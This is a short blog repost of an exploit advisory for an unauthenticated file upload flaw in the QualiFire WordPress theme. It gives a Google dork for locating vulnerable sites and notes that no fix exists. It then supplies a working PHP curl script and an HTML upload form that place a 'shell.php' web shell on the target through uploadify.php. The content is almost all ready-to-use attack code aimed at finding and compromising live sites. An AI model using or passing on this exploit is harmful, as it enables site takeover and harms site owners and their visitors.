Halaman

Wordpress Themes QualiFire File Upload Vulnerability

Sabtu, 26 Desember 2015

#- Title: Wordpress Themes QualiFire File Upload Vulnerability
#- Author: Tn_Scorpion
#- Date: 01-07-2012
#- Developer : AndonDesign
#- Link Download : themeforest .net/item/qualifire-wordpress-theme/105879
#- Google Dork: inurl:"/themes/qualifire/"
#- Fixed in Version : -
#- Tested on : win
=======================================================

-- Proof Of Concept --



Vulnerable : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

When Vuln : Blank

Remote file :
<?php
  
$uploadfile="shell.php";
$ch = curl_init("http://example .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
  
  print "$postResult";
?>

CSRF :
<form
action="http://target .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>


Shell Path : Here

Tidak ada komentar:

Posting Komentar